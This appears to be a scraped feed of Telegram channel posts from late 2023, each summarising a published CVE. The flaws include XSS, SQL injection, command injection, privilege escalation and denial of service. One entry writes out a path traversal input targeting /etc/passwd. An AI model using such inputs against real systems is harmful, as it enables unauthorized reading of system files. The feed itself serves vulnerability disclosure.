🚨 CVE-2023-44381October is a Content Management System (CMS) and web platform to assist with development workflow. An authenticated backend user with the `editor.cms_pages`, `editor.cms_layouts`, or `editor.cms_partials` permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to `cms.safe_mode` being enabled can craft a special request to include PHP code in the CMS template. This issue has been patched in version 3.4.15.🎖@cveNotify |
|
| 2023-12-03 17:00:14 |
🚨 CVE-2023-49277dpaste is an open source pastebin application written in Python using the Django framework. A security vulnerability has been identified in the expires parameter of the dpaste API, allowing for a POST Reflected XSS attack. This vulnerability can be exploited by an attacker to execute arbitrary JavaScript code in the context of a user's browser, potentially leading to unauthorized access, data theft, or other malicious activities. Users are strongly advised to upgrade to dpaste release v3.8 or later versions, as dpaste versions older than v3.8 are susceptible to the identified security vulnerability. No known workarounds have been identified, and applying the patch is the most effective way to remediate the vulnerability.🎖@cveNotify |
|
| 2023-12-03 17:00:13 |
🚨 CVE-2023-46174IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 269506.🎖@cveNotify |
|
| 2023-12-03 17:00:09 |
🚨 CVE-2023-43021IBM InfoSphere Information Server 11.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 266167.🎖@cveNotify |
|
| 2023-12-03 17:00:08 |
🚨 CVE-2023-42019IBM InfoSphere Information Server 11.7 could allow a remote attacker to cause a denial of service due to improper input validation. IBM X-Force ID: 265161.🎖@cveNotify |
|
| 2023-12-03 17:00:07 |
🚨 CVE-2023-42009IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 265504.🎖@cveNotify |
|
| 2023-12-03 17:00:06 |
🚨 CVE-2023-40699IBM InfoSphere Information Server 11.7 could allow a remote attacker to cause a denial of service due to improper input validation. IBM X-Force ID: 265161.🎖@cveNotify |
|
| 2023-12-03 17:00:02 |
🚨 CVE-2023-26024IBM Planning Analytics on Cloud Pak for Data 4.0 could allow an attacker on a shared network to obtain sensitive information caused by insecure network communication. IBM X-Force ID: 247898.🎖@cveNotify |
|
| 2023-12-03 17:00:01 |
🚨 CVE-2023-48893Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/staff_act.php.🎖@cveNotify |
|
| 2023-12-03 16:59:58 |
🚨 CVE-2023-48842D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.🎖@cveNotify |
|
| 2023-12-03 16:59:57 |
🚨 CVE-2023-4518A vulnerability exists in the input validation of the GOOSE messages where out of range values received and processed by the IED caused a reboot of the device. In order for an attacker to exploit the vulnerability, goose receiving blocks need to be configured.🎖@cveNotify |
|
| 2023-12-03 16:59:56 |
🚨 CVE-2023-45168IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 267966.🎖@cveNotify |
|
| 2023-12-03 11:30:10 |
🚨 CVE-2018-25094A vulnerability was found in ระบบบัญชีออนไลน์ Online Accounting System up to 1.4.0 and classified as problematic. This issue affects some unknown processing of the file ckeditor/filemanager/browser/default/image.php. The manipulation of the argument fid with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 9d9618422b980335bb30be612ea90f4f56cb992c. It is recommended to upgrade the affected component. The identifier VDB-246641 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-03 11:30:09 |
🚨 CVE-2022-37705A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported),🎖@cveNotify |
|
| 2023-12-03 11:30:08 |
🚨 CVE-2022-37703In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path.🎖@cveNotify |
|
| 2023-12-03 10:29:56 |
🚨 CVE-2022-48521An issue was discovered in OpenDKIM through 2.10.3, and 2.11.x through 2.11.0-Beta2. It fails to keep track of ordinal numbers when removing fake Authentication-Results header fields, which allows a remote attacker to craft an e-mail message with a fake sender address such that programs that rely on Authentication-Results from OpenDKIM will treat the message as having a valid DKIM signature when in fact it has none.🎖@cveNotify |
|
| 2023-12-03 03:29:56 |
🚨 CVE-2023-49926app/Lib/Tools/EventTimelineTool.php in MISP before 2.4.179 allows XSS in the event timeline widget.🎖@cveNotify |
|
| 2023-12-03 00:29:56 |
🚨 CVE-2023-47100In Perl before 5.38.2, S_parse_uniprop_string in regcomp.c can write to unallocated space because a property name associated with a \p{...} regular expression construct is mishandled. The earliest affected version is 5.30.0.🎖@cveNotify |
|
| 2023-12-02 23:29:56 |
🚨 CVE-2023-47100In Perl before 5.38.2, S_parse_uniprop_string in regcomp.c can write to unallocated space because a property name associated with a \p{...} regular expression construct is mishandled. The earlies affected version is 5.30.0.🎖@cveNotify |
|
| 2023-12-02 21:29:56 |
🚨 CVE-2023-6473A vulnerability, which was classified as problematic, was found in SourceCodester Online Quiz System 1.0. This affects an unknown part of the file take-quiz.php. The manipulation of the argument quiz_taker/year_section leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246639.🎖@cveNotify |
|
| 2023-12-02 19:29:56 |
🚨 CVE-2023-6472A vulnerability, which was classified as problematic, has been found in PHPEMS 7.0. This issue affects some unknown processing of the file app\content\cls\api.cls.php of the component Content Section Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-02 14:29:56 |
🚨 CVE-2023-6466A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. This vulnerability affects unknown code of the file /planet of the component User Comment Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246616.🎖@cveNotify |
|
| 2023-12-02 13:34:52 |
https://t.me/malwr |
|
| 2023-12-02 12:29:56 |
🚨 CVE-2023-6465A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been classified as problematic. This affects an unknown part of the file registered-user-testing.php. The manipulation of the argument regmobilenumber leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246615.🎖@cveNotify |
|
| 2023-12-02 09:29:56 |
🚨 CVE-2023-6464A vulnerability was found in SourceCodester User Registration and Login System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-246614 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-02 05:29:56 |
🚨 CVE-2023-39256Dell Rugged Control Center, version prior to 4.7, contains an improper access control vulnerability. A local malicious standard user could potentially exploit this vulnerability to modify the content in an unsecured folder during product installation and upgrade, leading to privilege escalation on the system.🎖@cveNotify |
|
| 2023-12-02 02:29:56 |
🚨 CVE-2022-41717An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.🎖@cveNotify |
|
| 2023-12-02 01:30:02 |
🚨 CVE-2023-46118RabbitMQ is a multi-protocol messaging and streaming broker. HTTP API did not enforce an HTTP request body limit, making it vulnerable for denial of service (DoS) attacks with very large messages. An authenticated user with sufficient credentials can publish a very large messages over the HTTP API and cause target node to be terminated by an "out-of-memory killer"-like mechanism. This vulnerability has been patched in versions 3.11.24 and 3.12.7.🎖@cveNotify |
|
| 2023-12-02 01:29:57 |
🚨 CVE-2023-39971Improper Neutralization of Input During Web Page Generation vulnerability in AcyMailing Enterprise component for Joomla allows XSS. This issue affects AcyMailing Enterprise component for Joomla: 6.7.0-8.6.3.🎖@cveNotify |
|
| 2023-12-02 01:29:56 |
🚨 CVE-2022-27912An issue was discovered in Joomla! 4.0.0 through 4.2.3. Sites with publicly enabled debug mode exposed data of previous requests.🎖@cveNotify |
|
| 2023-12-02 00:30:00 |
🚨 CVE-2023-5708The WP Post Columns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'column' shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-12-02 00:29:59 |
🚨 CVE-2023-48185Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.🎖@cveNotify |
|
| 2023-12-01 23:29:57 |
🚨 CVE-2023-48887A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request.🎖@cveNotify |
|
| 2023-12-01 23:29:56 |
🚨 CVE-2023-48801In TOTOLINK X6000R_Firmware V9.4.0cu.852_B20230719, the shttpd file sub_415534 function obtains fields from the front-end, connects them through the snprintf function, and passes them to the CsteSystem function, resulting in a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-01 22:30:15 |
🚨 CVE-2023-49281Calendarinho is an open source calendaring application to manage large teams of consultants. An Open Redirect issue occurs when a web application redirects users to external URLs without proper validation. This can lead to phishing attacks, where users are tricked into visiting malicious sites, potentially leading to information theft and reputational damage to the website used for redirection. The problem is has been patched in commit `15b2393`. Users are advised to update to a commit after `15b2393`. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-01 22:30:09 |
🚨 CVE-2023-49276Uptime Kuma is an open source self-hosted monitoring tool. In affected versions the Google Analytics element in vulnerable to Attribute Injection leading to Cross-Site-Scripting (XSS). Since the custom status interface can set an independent Google Analytics ID and the template has not been sanitized, there is an attribute injection vulnerability here, which can lead to XSS attacks. This vulnerability has been addressed in commit `f28dccf4e` which is included in release version 1.23.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-01 22:30:08 |
🚨 CVE-2023-44402Electron is an open source framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. This only impacts apps that have the `embeddedAsarIntegrityValidation` and `onlyLoadAppFromAsar` fuses enabled. Apps without these fuses enabled are not impacted. This issue is specific to macOS as these fuses are only currently supported on macOS. Specifically this issue can only be exploited if your app is launched from a filesystem the attacker has write access too. i.e. the ability to edit files inside the `.app` bundle on macOS which these fuses are supposed to protect against. There are no app side workarounds, you must update to a patched version of Electron.🎖@cveNotify |
|
| 2023-12-01 22:30:07 |
🚨 CVE-2023-44382October is a Content Management System (CMS) and web platform to assist with development workflow. An authenticated backend user with the `editor.cms_pages`, `editor.cms_layouts`, or `editor.cms_partials` permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to `cms.safe_mode` being enabled can write specific Twig code to escape the Twig sandbox and execute arbitrary PHP. This issue has been patched in 3.4.15.🎖@cveNotify |
|
| 2023-12-01 22:30:03 |
🚨 CVE-2023-32065OroCommerce is an open-source Business to Business Commerce application built with flexibility in mind. Detailed Order totals information may be received by Order ID. This issue is patched in version 5.0.11 and 5.1.1.🎖@cveNotify |
|
| 2023-12-01 22:30:02 |
🚨 CVE-2014-125095A vulnerability was found in BestWebSoft Contact Form Plugin 1.3.4 on WordPress and classified as problematic. Affected by this issue is the function bws_add_menu_render of the file bws_menu/bws_menu.php. The manipulation of the argument bwsmn_form_email leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3.7 is able to address this issue. The name of the patch is 4d531f74b4a801c805dc80360d4ea1312e9a278f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-225320.🎖@cveNotify |
|
| 2023-12-01 22:29:57 |
🚨 CVE-2014-125084A vulnerability, which was classified as critical, has been found in Gimmie Plugin 1.2.2 on vBulletin. This issue affects some unknown processing of the file trigger_referral.php. The manipulation of the argument referrername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The identifier of the patch is 7194a09353dd24a274678383a4418f2fd3fce6f7. It is recommended to upgrade the affected component. The identifier VDB-220205 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-01 22:29:56 |
🚨 CVE-2017-20155A vulnerability was found in Sterc Google Analytics Dashboard for MODX up to 1.0.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file core/components/analyticsdashboardwidget/elements/tpl/widget.analytics.tpl of the component Internal Search. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.0.6 is able to address this issue. The identifier of the patch is 855d9560d3782c105568eedf9b22a769fbf29cc0. It is recommended to upgrade the affected component. The identifier VDB-217069 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-01 22:00:01 |
🚨 CVE-2023-48713Knative Serving builds on Kubernetes to support deploying and serving of applications and functions as serverless containers. An attacker who controls a pod to a degree where they can control the responses from the /metrics endpoint can cause Denial-of-Service of the autoscaler from an unbound memory allocation bug. This is a DoS vulnerability, where a non-privileged Knative user can cause a DoS for the cluster. This issue has been patched in version 0.39.0.🎖@cveNotify |
|
| 2023-12-01 21:59:57 |
🚨 CVE-2023-5960An improper privilege management vulnerability in the hotspot feature of the Zyxel USG FLEX series firmware versions 4.50 through 5.37 and VPN series firmware versions 4.30 through 5.37 could allow an authenticated local attacker to access the system files on an affected device.🎖@cveNotify |
|
| 2023-12-01 21:59:56 |
🚨 CVE-2023-6202Mattermost fails to perform proper authorization in the /plugins/focalboard/api/v2/users endpoint allowing an attacker who is a guest user and knows the ID of another user to get their information (e.g. name, surname, nickname) via Mattermost Boards.🎖@cveNotify |
|
| 2023-12-01 21:29:57 |
🚨 CVE-2023-45223Mattermost fails to properly validate the "Show Full Name" option in a few endpoints in Mattermost Boards, allowing a member to get the full name of another user even if the Show Full Name option was disabled.🎖@cveNotify |
|
| 2023-12-01 21:29:56 |
🚨 CVE-2022-40433An issue was discovered in function ciMethodBlocks::make_block_at in Oracle JDK (HotSpot VM) 11, 17 and OpenJDK (HotSpot VM) 8, 11, 17, allows attackers to cause a denial of service. Note: Vendor states that this to is Defense in Depth at most due to the nature of the issue and the special circumstances required (server must be running particular code locally, code compiled with an old, old version of javac, etc.).🎖@cveNotify |
|
| 2023-12-01 21:00:09 |
🚨 CVE-2023-5737The WordPress Backup & Migration WordPress plugin before 1.4.4 does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.🎖@cveNotify |
|
| 2023-12-01 21:00:03 |
🚨 CVE-2023-41257A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-12-01 21:00:02 |
🚨 CVE-2023-38573A use-after-free vulnerability exists in the way Foxit Reader 12.1.2.15356 handles a signature field. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-12-01 21:00:01 |
🚨 CVE-2023-35985An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2023-12-01 20:59:57 |
🚨 CVE-2023-47865Mattermost fails to check if hardened mode is enabled when overriding the username and/or the icon when posting a post. If settings allowed integrations to override the username and profile picture when posting, a member could also override the username and icon when making a post even if the Hardened Mode setting was enabled🎖@cveNotify |
|
| 2023-12-01 20:59:56 |
🚨 CVE-2021-22636Texas Instruments TI-RTOS, when configured to use HeapMem heap(default), malloc returns a valid pointer to a small buffer on extremely large values, which can trigger an integer overflow vulnerability in 'HeapMem_allocUnprotected' and result in code execution.🎖@cveNotify |
|
| 2023-12-01 20:30:09 |
🚨 CVE-2023-5885The discontinued FFS Colibri product allows a remote user to access files on the system including files containing login credentials for other users.🎖@cveNotify |
|
| 2023-12-01 20:30:03 |
🚨 CVE-2023-5974The WPB Show Core WordPress plugin through 2.2 is vulnerable to server-side request forgery (SSRF) via the `path` parameter.🎖@cveNotify |
|
| 2023-12-01 20:30:02 |
🚨 CVE-2023-49029Cross Site Scripting vulnerability in smpn1smg absis v.2017-10-19 and before allows a remote attacker to execute arbitrary code via the nama parameter in the lock/lock.php file.🎖@cveNotify |
|
| 2023-12-01 20:29:57 |
🚨 CVE-2023-6276A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file general/wiki/cp/ct/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-246105 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-01 20:29:56 |
🚨 CVE-2021-27504Texas Instruments devices running FREERTOS, malloc returns a valid pointer to a small buffer on extremely large values, which can trigger an integer overflow vulnerability in 'malloc' for FreeRTOS, resulting in code execution.🎖@cveNotify |
|
| 2023-12-01 19:59:56 |
🚨 CVE-2023-4642The kk Star Ratings WordPress plugin before 5.4.6 does not implement atomic operations, allowing one user vote multiple times on a poll due to a Race Condition.🎖@cveNotify |
|
| 2023-12-01 19:29:57 |
🚨 CVE-2023-48646Zoho ManageEngine RecoveryManager Plus before 6070 allows admin users to execute arbitrary commands via proxy settings.🎖@cveNotify |
|
| 2023-12-01 19:29:56 |
🚨 CVE-2023-26031Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges.Hadoop 3.3.0 updated the " YARN Secure Containers https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html " to add a feature for executing user-submitted applications in isolated linux containers.The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs.The patch " YARN-10495 https://issues.apache.org/jira/browse/YARN-10495 . make the rpath of container-executor configurable" modified the library loading path for loading .so files from "$ORIGIN/" to ""$ORIGIN/:../lib/native/". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root.If the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges.The fix for the vulnerability is to revert the change, which is done in YARN-11441 https://issues.apache.org/jira/browse/YARN-11441 , "Revert YARN-10495". This patch is in hadoop-3.3.5.To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path "./lib/native/" then it is at risk$ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH) Library runpath: [$ORIGIN/:../lib/native/]If it does not, then it is safe:$ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH) Library runpath: [$ORIGIN/]For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set$ ls -laF /opt/hadoop/bin/container-executor---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executorA safe installation lacks the suid bit; ideally is also not owned by root.$ ls -laF /opt/hadoop/bin/container-executor-rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executorThis configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.🎖@cveNotify |
|
| 2023-12-01 18:59:58 |
🚨 CVE-2023-4590Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.🎖@cveNotify |
|
| 2023-12-01 18:59:57 |
🚨 CVE-2021-22142Kibana contains an embedded version of the Chromium browser that the Reporting feature uses to generate the downloadable reports. If a user with permissions to generate reports is able to render arbitrary HTML with this browser, they may be able to leverage known Chromium vulnerabilities to conduct further attacks. Kibana contains a number of protections to prevent this browser from rendering arbitrary content.🎖@cveNotify |
|
| 2023-12-01 18:59:56 |
🚨 CVE-2023-47264Certain WithSecure products have a buffer over-read whereby processing certain fuzz file types may cause a denial of service (DoS). This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 15 and later.🎖@cveNotify |
|
| 2023-12-01 18:29:58 |
🚨 CVE-2023-49322Certain WithSecure products allow a Denial of Service because there is an unpack handler crash that can lead to a scanning engine crash. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant 1.0.35-1.🎖@cveNotify |
|
| 2023-12-01 18:29:57 |
🚨 CVE-2022-23821Improper access control in System Management Mode (SMM) may allow an attacker to write to SPI ROM potentially leading to arbitrary code execution.🎖@cveNotify |
|
| 2023-12-01 18:29:56 |
🚨 CVE-2022-23820Failure to validate the AMD SMM communication buffermay allow an attacker to corrupt the SMRAM potentially leading to arbitrarycode execution.🎖@cveNotify |
|
| 2023-12-01 17:59:57 |
🚨 CVE-2023-49102NZBGet 21.1 allows authenticated remote code execution because the unarchive programs (7za and unrar) preserve executable file permissions. An attacker with the Control capability can execute a file by setting the value of SevenZipCommand or UnrarCmd. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-01 17:59:56 |
🚨 CVE-2023-47263Certain WithSecure products allow a Denial of Service (DoS) in the antivirus engine when scanning a fuzzed PE32 file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 15 and later.🎖@cveNotify |
|
| 2023-12-01 17:29:57 |
🚨 CVE-2023-6438A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /WebArticle/articles/ of the component Like Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-246438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-01 17:29:56 |
🚨 CVE-2023-6164The MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to CSS Injection via the ‘newColor’ parameter in all versions up to, and including, 4.5.1.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary CSS values into the site tags.🎖@cveNotify |
|
| 2023-12-01 17:00:21 |
🚨 CVE-2023-41442An issue in Kloudq Technologies Limited Tor Equip 1.0, Tor Loco Mini 1.0 through 3.1 allows a remote attacker to execute arbitrary code via a crafted request to the MQTT component.🎖@cveNotify |
|
| 2023-12-01 16:30:08 |
🚨 CVE-2023-48842D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.🎖@cveNotify |
|
| 2023-12-01 16:30:07 |
🚨 CVE-2023-48813Senayan Library Management Systems (Slims) 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/fines_report.php.🎖@cveNotify |
|
| 2023-12-01 16:30:03 |
🚨 CVE-2023-49104An issue was discovered in ownCloud owncloud/oauth2 before 0.6.1, when Allow Subdomains is enabled. An attacker is able to pass in a crafted redirect-url that bypasses validation, and consequently allows an attacker to redirect callbacks to a Top Level Domain controlled by the attacker.🎖@cveNotify |
|
| 2023-12-01 16:30:02 |
🚨 CVE-2023-38435An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Apache Felix Healthcheck Webconsole Plugin version 2.0.2 and prior may allow an attacker to perform a reflected cross-site scripting (XSS) attack.Upgrade to Apache Felix Healthcheck Webconsole Plugin 2.1.0 or higher.🎖@cveNotify |
|
| 2023-12-01 15:00:03 |
🚨 CVE-2023-6461Cross-site Scripting (XSS) - Reflected in GitHub repository viliusle/minipaint prior to 4.14.0.🎖@cveNotify |
|
| 2023-12-01 15:00:02 |
🚨 CVE-2023-5636Unrestricted Upload of File with Dangerous Type vulnerability in ArslanSoft Education Portal allows Command Injection.This issue affects Education Portal: before v1.1.🎖@cveNotify |
|
| 2023-12-01 15:00:01 |
🚨 CVE-2023-5635Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ArslanSoft Education Portal allows Account Footprinting.This issue affects Education Portal: before v1.1.🎖@cveNotify |
|
| 2023-12-01 14:59:58 |
🚨 CVE-2023-5634Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ArslanSoft Education Portal allows SQL Injection.This issue affects Education Portal: before v1.1.🎖@cveNotify |
|
| 2023-12-01 14:59:57 |
🚨 CVE-2023-28895The password for access to the debugging console of the PoWer Controller chip (PWC) of the MIB3 infotainment is hard-coded in the firmware. The console allows attackers with physical access to the MIB3 unit to gain full control over the PWC chip.Vulnerability found on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2023-12-01 14:59:56 |
🚨 CVE-2023-4586A vulnerability was found in the Hot Rod client. This security issue occurs as the Hot Rod client does not enable hostname validation when using TLS, possibly resulting in a man-in-the-middle (MITM) attack.🎖@cveNotify |
|
| 2023-12-01 14:30:28 |
🚨 CVE-2023-28895The password for access to the debugging console of the PoWer Controller chip (PWC) of the MIB3 infotainment is hard-coded in the firmware. The console allows attackers with physical access to the MIB3 unit to gain full control over the PWC chip.Vulnerability found on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2023-12-01 14:30:22 |
🚨 CVE-2023-20240Multiple vulnerabilities in Cisco Secure Client Software, formerly AnyConnect Secure Mobility Client, could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system. These vulnerabilities are due to an out-of-bounds memory read from Cisco Secure Client Software. An attacker could exploit these vulnerabilities by logging in to an affected device at the same time that another user is accessing Cisco Secure Client on the same system, and then sending crafted packets to a port on that local host. A successful exploit could allow the attacker to crash the VPN Agent service, causing it to be unavailable to all users of the system. To exploit these vulnerabilities, the attacker must have valid credentials on a multi-user system.🎖@cveNotify |
|
| 2023-12-01 14:30:21 |
🚨 CVE-2021-31514This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13679.🎖@cveNotify |
|
| 2023-12-01 14:30:20 |
🚨 CVE-2021-31513This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13678.🎖@cveNotify |
|
| 2023-12-01 14:30:17 |
🚨 CVE-2021-31512This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13677.🎖@cveNotify |
|
| 2023-12-01 14:30:16 |
🚨 CVE-2021-31510This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13675.🎖@cveNotify |
|
| 2023-12-01 14:30:15 |
